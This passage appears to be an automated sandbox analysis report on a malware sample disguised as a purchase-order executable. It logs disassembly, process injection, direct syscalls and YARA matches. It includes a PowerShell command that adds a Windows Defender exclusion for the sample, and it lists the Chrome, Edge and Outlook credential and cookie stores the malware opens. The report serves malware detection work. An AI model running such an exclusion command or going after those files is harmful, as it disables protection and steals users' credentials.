            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166674D mov esi, dword ptr fs:[00000030h]6_2_0166674D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166674D mov eax, dword ptr fs:[00000030h]6_2_0166674D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166674D mov eax, dword ptr fs:[00000030h]6_2_0166674D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630750 mov eax, dword ptr fs:[00000030h]6_2_01630750
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE75D mov eax, dword ptr fs:[00000030h]6_2_016BE75D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672750 mov eax, dword ptr fs:[00000030h]6_2_01672750
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672750 mov eax, dword ptr fs:[00000030h]6_2_01672750
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B4755 mov eax, dword ptr fs:[00000030h]6_2_016B4755
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C720 mov eax, dword ptr fs:[00000030h]6_2_0166C720
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C720 mov eax, dword ptr fs:[00000030h]6_2_0166C720
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166273C mov eax, dword ptr fs:[00000030h]6_2_0166273C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166273C mov ecx, dword ptr fs:[00000030h]6_2_0166273C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166273C mov eax, dword ptr fs:[00000030h]6_2_0166273C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AC730 mov eax, dword ptr fs:[00000030h]6_2_016AC730
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C700 mov eax, dword ptr fs:[00000030h]6_2_0166C700
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630710 mov eax, dword ptr fs:[00000030h]6_2_01630710
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01660710 mov eax, dword ptr fs:[00000030h]6_2_01660710
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016527ED mov eax, dword ptr fs:[00000030h]6_2_016527ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016527ED mov eax, dword ptr fs:[00000030h]6_2_016527ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016527ED mov eax, dword ptr fs:[00000030h]6_2_016527ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE7E1 mov eax, dword ptr fs:[00000030h]6_2_016BE7E1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016347FB mov eax, dword ptr fs:[00000030h]6_2_016347FB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016347FB mov eax, dword ptr fs:[00000030h]6_2_016347FB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163C7C0 mov eax, dword ptr fs:[00000030h]6_2_0163C7C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B07C3 mov eax, dword ptr fs:[00000030h]6_2_016B07C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016307AF mov eax, dword ptr fs:[00000030h]6_2_016307AF
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E47A0 mov eax, dword ptr fs:[00000030h]6_2_016E47A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D678E mov eax, dword ptr fs:[00000030h]6_2_016D678E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F866E mov eax, dword ptr fs:[00000030h]6_2_016F866E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F866E mov eax, dword ptr fs:[00000030h]6_2_016F866E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A660 mov eax, dword ptr fs:[00000030h]6_2_0166A660
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A660 mov eax, dword ptr fs:[00000030h]6_2_0166A660
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01662674 mov eax, dword ptr fs:[00000030h]6_2_01662674
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164C640 mov eax, dword ptr fs:[00000030h]6_2_0164C640
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E627 mov eax, dword ptr fs:[00000030h]6_2_0164E627
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01666620 mov eax, dword ptr fs:[00000030h]6_2_01666620
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01668620 mov eax, dword ptr fs:[00000030h]6_2_01668620
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163262C mov eax, dword ptr fs:[00000030h]6_2_0163262C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE609 mov eax, dword ptr fs:[00000030h]6_2_016AE609
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672619 mov eax, dword ptr fs:[00000030h]6_2_01672619
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE6F2 mov eax, dword ptr fs:[00000030h]6_2_016AE6F2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE6F2 mov eax, dword ptr fs:[00000030h]6_2_016AE6F2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE6F2 mov eax, dword ptr fs:[00000030h]6_2_016AE6F2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE6F2 mov eax, dword ptr fs:[00000030h]6_2_016AE6F2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B06F1 mov eax, dword ptr fs:[00000030h]6_2_016B06F1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B06F1 mov eax, dword ptr fs:[00000030h]6_2_016B06F1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0166A6C7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A6C7 mov eax, dword ptr fs:[00000030h]6_2_0166A6C7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C6A6 mov eax, dword ptr fs:[00000030h]6_2_0166C6A6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016666B0 mov eax, dword ptr fs:[00000030h]6_2_016666B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634690 mov eax, dword ptr fs:[00000030h]6_2_01634690
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634690 mov eax, dword ptr fs:[00000030h]6_2_01634690
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01656962 mov eax, dword ptr fs:[00000030h]6_2_01656962
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01656962 mov eax, dword ptr fs:[00000030h]6_2_01656962
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01656962 mov eax, dword ptr fs:[00000030h]6_2_01656962
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167096E mov eax, dword ptr fs:[00000030h]6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167096E mov edx, dword ptr fs:[00000030h]6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167096E mov eax, dword ptr fs:[00000030h]6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D4978 mov eax, dword ptr fs:[00000030h]6_2_016D4978
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D4978 mov eax, dword ptr fs:[00000030h]6_2_016D4978
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BC97C mov eax, dword ptr fs:[00000030h]6_2_016BC97C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B0946 mov eax, dword ptr fs:[00000030h]6_2_016B0946
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704940 mov eax, dword ptr fs:[00000030h]6_2_01704940
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B892A mov eax, dword ptr fs:[00000030h]6_2_016B892A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C892B mov eax, dword ptr fs:[00000030h]6_2_016C892B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE908 mov eax, dword ptr fs:[00000030h]6_2_016AE908
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE908 mov eax, dword ptr fs:[00000030h]6_2_016AE908
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BC912 mov eax, dword ptr fs:[00000030h]6_2_016BC912
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01628918 mov eax, dword ptr fs:[00000030h]6_2_01628918
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01628918 mov eax, dword ptr fs:[00000030h]6_2_01628918
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE9E0 mov eax, dword ptr fs:[00000030h]6_2_016BE9E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016629F9 mov eax, dword ptr fs:[00000030h]6_2_016629F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016629F9 mov eax, dword ptr fs:[00000030h]6_2_016629F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C69C0 mov eax, dword ptr fs:[00000030h]6_2_016C69C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016649D0 mov eax, dword ptr fs:[00000030h]6_2_016649D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FA9D3 mov eax, dword ptr fs:[00000030h]6_2_016FA9D3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016309AD mov eax, dword ptr fs:[00000030h]6_2_016309AD
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016309AD mov eax, dword ptr fs:[00000030h]6_2_016309AD
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B89B3 mov esi, dword ptr fs:[00000030h]6_2_016B89B3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B89B3 mov eax, dword ptr fs:[00000030h]6_2_016B89B3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B89B3 mov eax, dword ptr fs:[00000030h]6_2_016B89B3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE872 mov eax, dword ptr fs:[00000030h]6_2_016BE872
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE872 mov eax, dword ptr fs:[00000030h]6_2_016BE872
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6870 mov eax, dword ptr fs:[00000030h]6_2_016C6870
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6870 mov eax, dword ptr fs:[00000030h]6_2_016C6870
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01642840 mov ecx, dword ptr fs:[00000030h]6_2_01642840
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01660854 mov eax, dword ptr fs:[00000030h]6_2_01660854
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634859 mov eax, dword ptr fs:[00000030h]6_2_01634859
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634859 mov eax, dword ptr fs:[00000030h]6_2_01634859
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov ecx, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe; direct syscalls:
                NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                NtQueryAttributesFile: Direct from: 0x76EF2E6C
                NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                NtQuerySystemInformation: Direct from: 0x76EF48CC
                NtOpenSection: Direct from: 0x76EF2E0C
                NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                NtQueryInformationToken: Direct from: 0x76EF2CAC
                NtCreateFile: Direct from: 0x76EF2FEC
                NtOpenFile: Direct from: 0x76EF2DCC
                NtTerminateThread: Direct from: 0x76EF2FCC
                NtOpenKeyEx: Direct from: 0x76EF2B9C
                NtSetInformationProcess: Direct from: 0x76EF2C5C
                NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                NtNotifyChangeKey: Direct from: 0x76EF3C2C
                NtCreateMutant: Direct from: 0x76EF35CC
                NtResumeThread: Direct from: 0x76EF36AC
                NtMapViewOfSection: Direct from: 0x76EF2D1C
                NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                NtQuerySystemInformation: Direct from: 0x76EF2DFC
                NtReadFile: Direct from: 0x76EF2ADC
                NtDelayExecution: Direct from: 0x76EF2DDC
                NtQueryInformationProcess: Direct from: 0x76EF2C26
                NtResumeThread: Direct from: 0x76EF2FBC
                NtCreateUserProcess: Direct from: 0x76EF371C
                NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                NtWriteVirtualMemory: Direct from: 0x76EF490C
                NtSetInformationThread: Direct from: 0x76EE63F9
                NtClose: Direct from: 0x76EF2B6C
                NtSetInformationThread: Direct from: 0x76EF2B4C
                NtReadVirtualMemory: Direct from: 0x76EF2E8C
                NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Memory written: C:\Users\user\Desktop\PO Copy_7854569.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Section loaded: NULL target: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Section loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: NULL target: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe protection: read write
            Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: NULL target: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\openfiles.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\openfiles.exe; Thread register set: target process: 5756
            Source: C:\Windows\SysWOW64\openfiles.exe; Thread APC queued: target process: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Process created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe; Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
            Source: C:\Windows\SysWOW64\openfiles.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4440013475.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000000.2040563342.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2206107371.0000000001761000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: Program Manager
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Queries volume information:
                C:\Users\user\Desktop\PO Copy_7854569.exe VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                C:\Windows\Fonts\micross.ttf VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information:
                C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                C:\ VolumeInformation
                C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\openfiles.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe, Code function: 6_2_0041824F I_ScRpcBindA
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
